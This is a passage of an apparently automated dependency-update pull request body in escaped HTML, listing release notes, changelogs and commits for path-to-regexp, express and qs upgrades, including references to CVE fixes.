6.x\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)  f1253b4\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eUpdated README\u003c/h2\u003e\n\u003cp\u003eNo API changes. Documentation only release.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eChanged\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix readme example  c7ec332\u003c/li\u003e\n\u003cli\u003eUpdate shield URL  e828000\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/75a92c3d7c42159f459ab42f346899152906ea8c\"\u003e\u003ccode\u003e75a92c3\u003c/code\u003e\u003c/a\u003e 6.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894\"\u003e\u003ccode\u003ef1253b4\u003c/code\u003e\u003c/a\u003e Add backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/28a5b27bb9e7f09dddb573ac50923f2337ea0dbf\"\u003e\u003ccode\u003e28a5b27\u003c/code\u003e\u003c/a\u003e 6.2.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/270876d30b77c83b16c7bb01b578ae9e278c3faa\"\u003e\u003ccode\u003e270876d\u003c/code\u003e\u003c/a\u003e Test on min node 16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/d5a42b69ae5fc128f85783714bbf08408d1560ee\"\u003e\u003ccode\u003ed5a42b6\u003c/code\u003e\u003c/a\u003e Run tests on ubuntu\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/1c265a158c8ffc8c4fb490fc1a9a5020b147d1f2\"\u003e\u003ccode\u003e1c265a1\u003c/code\u003e\u003c/a\u003e Upgrade dev deps, prettier format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/c7ec332e87d8560673884d5629e1cb23cb03cb87\"\u003e\u003ccode\u003ec7ec332\u003c/code\u003e\u003c/a\u003e Fix readme example\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/25da491127d5dfd13eb5ad839bd3559622b77c56\"\u003e\u003ccode\u003e25da491\u003c/code\u003e\u003c/a\u003e Bump node v14 for tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/980d1db9b82fc85019c30da6e689df3beb27e12b\"\u003e\u003ccode\u003e980d1db\u003c/code\u003e\u003c/a\u003e Add v8 coverage\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/e8280006c80604baaf18e8572a983d2a265a6e83\"\u003e\u003ccode\u003ee828000\u003c/code\u003e\u003c/a\u003e Update shield URL\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `path-to-regexp` from 1.8.0 to 1.9.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pillarjs/path-to-regexp/releases\"\u003epath-to-regexp's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eFix backtracking in 6.x\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)  f1253b4\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eUpdated README\u003c/h2\u003e\n\u003cp\u003eNo API changes. Documentation only release.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eChanged\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix readme example  c7ec332\u003c/li\u003e\n\u003cli\u003eUpdate shield URL  e828000\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/75a92c3d7c42159f459ab42f346899152906ea8c\"\u003e\u003ccode\u003e75a92c3\u003c/code\u003e\u003c/a\u003e 6.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894\"\u003e\u003ccode\u003ef1253b4\u003c/code\u003e\u003c/a\u003e Add backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/28a5b27bb9e7f09dddb573ac50923f2337ea0dbf\"\u003e\u003ccode\u003e28a5b27\u003c/code\u003e\u003c/a\u003e 6.2.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/270876d30b77c83b16c7bb01b578ae9e278c3faa\"\u003e\u003ccode\u003e270876d\u003c/code\u003e\u003c/a\u003e Test on min node 16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/d5a42b69ae5fc128f85783714bbf08408d1560ee\"\u003e\u003ccode\u003ed5a42b6\u003c/code\u003e\u003c/a\u003e Run tests on ubuntu\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/1c265a158c8ffc8c4fb490fc1a9a5020b147d1f2\"\u003e\u003ccode\u003e1c265a1\u003c/code\u003e\u003c/a\u003e Upgrade dev deps, prettier format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/c7ec332e87d8560673884d5629e1cb23cb03cb87\"\u003e\u003ccode\u003ec7ec332\u003c/code\u003e\u003c/a\u003e Fix readme example\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/25da491127d5dfd13eb5ad839bd3559622b77c56\"\u003e\u003ccode\u003e25da491\u003c/code\u003e\u003c/a\u003e Bump node v14 for tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/980d1db9b82fc85019c30da6e689df3beb27e12b\"\u003e\u003ccode\u003e980d1db\u003c/code\u003e\u003c/a\u003e Add v8 coverage\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/e8280006c80604baaf18e8572a983d2a265a6e83\"\u003e\u003ccode\u003ee828000\u003c/code\u003e\u003c/a\u003e Update shield URL\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `express` from 4.18.2 to 4.22.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/express/releases\"\u003eexpress's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.22.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!IMPORTANT]\u003cbr /\u003e\nThe prior release (4.22.0) included an erroneous breaking change related to the extended query parser. There is no actual security vulnerability associated with this behavior (CVE-2024-51999 has been rejected). The change has been fully reverted in this release.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cul\u003e\n\u003cli\u003eRelease: 4.22.1 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6934\"\u003eexpressjs/express#6934\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.22.0...v4.22.1\"\u003ehttps://github.com/expressjs/express/compare/4.22.0...v4.22.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.22.0\u003c/h2\u003e\n\u003ch2\u003eImportant: Security\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRefactor: improve readability by \u003ca href=\"https://github.com/sazk07\"\u003e\u003ccode\u003e@​sazk07\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6190\"\u003eexpressjs/express#6190\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add support for Node.js@23.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6080\"\u003eexpressjs/express#6080\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMethod functions with no path should error by \u003ca href=\"https://github.com/wesleytodd\"\u003e\u003ccode\u003e@​wesleytodd\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/5957\"\u003eexpressjs/express#5957\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: updated github actions ci workflow by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6323\"\u003eexpressjs/express#6323\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: reorder \u003ccode\u003enpm i\u003c/code\u003e steps to fix ci for older node versions by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6336\"\u003eexpressjs/express#6336\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBackport: ci: add node.js 24 to test matrix by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6506\"\u003eexpressjs/express#6506\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(4.x): wider range for query test skip by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6513\"\u003eexpressjs/express#6513\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003euse tilde notation for certain dependencies by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6905\"\u003eexpressjs/express#6905\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: qs@6.14.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6909\"\u003eexpressjs/express#6909\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation for \u003ccode\u003eqs\u003c/code\u003e by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6919\"\u003eexpressjs/express#6919\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 4.22.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6921\"\u003eexpressjs/express#6921\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.21.2...4.22.0\"\u003ehttps://github.com/expressjs/express/compare/4.21.2...4.22.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.21.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd funding field (v4) by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6065\"\u003eexpressjs/express#6065\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.11 by \u003ca href=\"https://github.com/blakeembrey\"\u003e\u003ccode\u003e@​blakeembrey\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/5956\"\u003eexpressjs/express#5956\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: bump path-to-regexp@0.1.12 by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6209\"\u003eexpressjs/express#6209\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 4.21.2 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6094\"\u003eexpressjs/express#6094\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.21.1...4.21.2\"\u003ehttps://github.com/expressjs/express/compare/4.21.1...4.21.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.21.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBackport a fix for CVE-2024-47764 to the 4.x branch by \u003ca href=\"https://github.com/joshbuker\"\u003e\u003ccode\u003e@​joshbuker\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6029\"\u003eexpressjs/express#6029\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 4.21.1 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6031\"\u003eexpressjs/express#6031\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.21.0...4.21.1\"\u003ehttps://github.com/expressjs/express/compare/4.21.0...4.21.1\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/express/blob/v4.22.1/History.md\"\u003eexpress's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e4.22.1 / 2025-12-01\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eRevert security fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.22.0 / 2025-12-01\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation for dependencies\u003c/li\u003e\n\u003cli\u003edeps: qs@6.14.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.2 / 2024-11-06\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.12\n\u003cul\u003e\n\u003cli\u003eFix backtracking protection\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.11\n\u003cul\u003e\n\u003cli\u003eThrows an error on invalid path values\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.1 / 2024-10-08\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eBackported a fix for \u003ca href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-47764\"\u003eCVE-2024-47764\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.0 / 2024-09-11\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate \u003ccode\u003eres.location(\u0026quot;back\u0026quot;)\u003c/code\u003e and \u003ccode\u003eres.redirect(\u0026quot;back\u0026quot;)\u003c/code\u003e magic string\u003c/li\u003e\n\u003cli\u003edeps: serve-static@1.16.2\n\u003cul\u003e\n\u003cli\u003eincludes send@0.19.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: finalhandler@1.3.1\u003c/li\u003e\n\u003cli\u003edeps: qs@6.13.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.20.0 / 2024-09-10\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: serve-static@0.16.0\n\u003cul\u003e\n\u003cli\u003eRemove link renderization in html while redirecting\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: send@0.19.0\n\u003cul\u003e\n\u003cli\u003eRemove link renderization in html while redirecting\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: body-parser@0.6.0\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003edepth\u003c/code\u003e option to customize the depth level in the parser\u003c/li\u003e\n\u003cli\u003eIMPORTANT: The default \u003ccode\u003edepth\u003c/code\u003e level for parsing URL-encoded data is now \u003ccode\u003e32\u003c/code\u003e (previously was \u003ccode\u003eInfinity\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eRemove link renderization in html while using \u003ccode\u003eres.redirect\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.10\n\u003cul\u003e\n\u003cli\u003eAdds support for named matching groups in the routes using a regex\u003c/li\u003e\n\u003cli\u003eAdds backtracking protection to parameters without regexes defined\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: encodeurl@~2.0.0\n\u003cul\u003e\n\u003cli\u003eRemoves encoding of \u003ccode\u003e\\\u003c/code\u003e, \u003ccode\u003e|\u003c/code\u003e, and \u003ccode\u003e^\u003c/code\u003e to align better with URL spec\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eDeprecate passing \u003ccode\u003eoptions.maxAge\u003c/code\u003e and \u003ccode\u003eoptions.expires\u003c/code\u003e to \u003ccode\u003eres.clearCookie\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/12fae14531a78f19a2caaa5d4f58d9b01eaf3194\"\u003e\u003ccode\u003e12fae14\u003c/code\u003e\u003c/a\u003e 4.22.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/5ddf311af32e772a77fd48b6266ce2f1ba330e1a\"\u003e\u003ccode\u003e5ddf311\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;sec: security patch for CVE-2024-51999\u0026quot;\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/49744abd1120484fe64d7bde1cd3197c32523b6e\"\u003e\u003ccode\u003e49744ab\u003c/code\u003e\u003c/a\u003e 4.22.0 (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6921\"\u003e#6921\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/6e97452f600a3b01719fbc5517d833c7646b0bb7\"\u003e\u003ccode\u003e6e97452\u003c/code\u003e\u003c/a\u003e sec: security patch for CVE-2024-51999\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/6a23d34d652b9e69a4486d2a2a0dea54b9685fa5\"\u003e\u003ccode\u003e6a23d34\u003c/code\u003e\u003c/a\u003e deps: use tilde notation for \u003ccode\u003eqs\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6919\"\u003e#6919\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/8c12cdf93b89a4628b59179e3cc0722fc517d6b3\"\u003e\u003ccode\u003e8c12cdf\u003c/code\u003e\u003c/a\u003e deps: qs@6.14.0 (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6909\"\u003e#6909\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/7fea74fcf02764580f38f2a7f1932dfa54cddd90\"\u003e\u003ccode\u003e7fea74f\u003c/code\u003e\u003c/a\u003e deps: use tilde notation for certain dependencies (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6905\"\u003e#6905\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/dac7a0475a99e9dfc57b3b8e6d5bdf52813f1944\"\u003e\u003ccode\u003edac7a04\u003c/code\u003e\u003c/a\u003e chore: wider range for query test skip (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6513\"\u003e#6513\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/997919b48879bbd53171c3b4e5dd1b04ad139241\"\u003e\u003ccode\u003e997919b\u003c/code\u003e\u003c/a\u003e ci: add node.js 24 to test matrix (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6506\"\u003e#6506\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/36fb59c6c7d9dfca0b08dfeafb5b6e4a249234a1\"\u003e\u003ccode\u003e36fb59c\u003c/code\u003e\u003c/a\u003e fix(ci): reorder \u003ccode\u003enpm i\u003c/code\u003e steps to fix ci for older node versions (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6336\"\u003e#6336\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/expressjs/express/compare/4.18.2...v4.22.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~jonchurch\"\u003ejonchurch\u003c/a\u003e, a new releaser for express since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `qs` from 6.11.1 to 6.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ljharb/qs/blob/main/CHANGELOG.md\"\u003eqs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: mark overflow objects for indexed notation exceeding \u003ccode\u003earrayLimit\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/546\"\u003e#546\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003earrayLimit\u003c/code\u003e means max count, not max index, in \u003ccode\u003ecombine\u003c/code\u003e/\u003ccode\u003emerge\u003c/code\u003e/\u003ccode\u003eparseArrayValue\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: throw on \u003ccode\u003earrayLimit\u003c/code\u003e exceeded with indexed notation when \u003ccode\u003ethrowOnLimitExceeded\u003c/code\u003e is true (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: enforce \u003ccode\u003earrayLimit\u003c/code\u003e on \u003ccode\u003ecomma\u003c/code\u003e-parsed values\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: fix error message to reflect arrayLimit as max index; remove extraneous comments (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/545\"\u003e#545\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Robustness] avoid \u003ccode\u003e.push\u003c/code\u003e, use \u003ccode\u003evoid\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/418\"\u003e#418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/543\"\u003e#543\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] replace runkit CI badge with shields.io check-runs badge\u003c/li\u003e\n\u003cli\u003e[meta] fix changelog typo (\u003ccode\u003earrayLength\u003c/code\u003e → \u003ccode\u003earrayLimit\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003e[actions] fix rebase workflow permissions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] ensure \u003ccode\u003earrayLimit\u003c/code\u003e applies to \u003ccode\u003e[]\u003c/code\u003e notation as 